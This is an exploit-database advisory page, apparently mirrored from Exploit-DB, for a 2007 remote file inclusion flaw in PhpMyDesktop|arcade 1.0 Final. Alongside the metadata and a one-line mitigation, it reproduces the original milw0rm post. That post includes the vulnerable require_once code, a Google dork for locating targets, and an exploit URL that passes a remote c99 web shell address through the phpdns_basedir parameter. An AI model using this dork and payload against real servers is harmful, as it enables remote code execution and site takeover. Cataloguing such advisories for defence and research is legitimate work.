PhpMyDesktop|arcade 1.0 Final (phpdns_basedir) Remote File Include

vendor:

PhpMyDesktop|arcade 1.0 Final

by:

RoMaNcYxHaCkEr

5.5

CVSS

MEDIUM

Remote File Include

CWE

Product Name: PhpMyDesktop|arcade 1.0 Final

Affected Version From: PhpMyDesktop|arcade 1.0 Final

Affected Version To: PhpMyDesktop|arcade 1.0 Final

Patch Exists: NO

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested:

2007

PhpMyDesktop|arcade 1.0 Final (phpdns_basedir) Remote File Include

The vulnerability exists in the RR.php file of PhpMyDesktop|arcade 1.0 Final, where the phpdns_basedir parameter is not properly validated, allowing remote attackers to include arbitrary files.

Mitigation:

Proper input validation should be implemented to prevent remote file inclusion attacks.

Source

Exploit-DB raw data:

# Name : PhpMyDesktop|arcade 1.0 Final (phpdns_basedir) Remote File Include
# Download From : http://mesh.dl.sourceforge.net/sourceforge/pmd-arcade/pmd_arcade_1_0_final.zip
# Found By : RoMaNcYxHaCkEr
# Home Page : Not Yet :(
# Google Dork : Powered by phpMyDesktop|arcade v1.0 (final)
============================================================================
# Vulne Code In File RR.php In Line 1 & 2 :
 
require_once("$phpdns_basedir/DNS/RR/A.php");
require_once("$phpdns_basedir/DNS/RR/AAAA.php");
# Exploit:
www.RxH.com/pmd_arcade_1_0_final/sources/libs/geoip/DNS/RR.php?phpdns_basedir=http://no-hack.fr/shells/c99.txt?

============================================================================
# Greet To :
Cold Z3ro My Master (Hackteach.org)
Hack15 TeaM (V99x.com)
Sniper-Sa (Sniper-sa.com)
Tryag TeaM (Tryag.com)
Yee7 TeaM (Yee7.com)
H-T TeaM (no-hack.fr)
Str0ck
My5ql Team
Also: Saudi Kafo , Adel Alroh , Mr-Google , Kill eye And All My Friends
# For Contact : RxH@HotMail.iT
Happy Aid All Muslims
Best Wishes

# milw0rm.com [2007-12-18]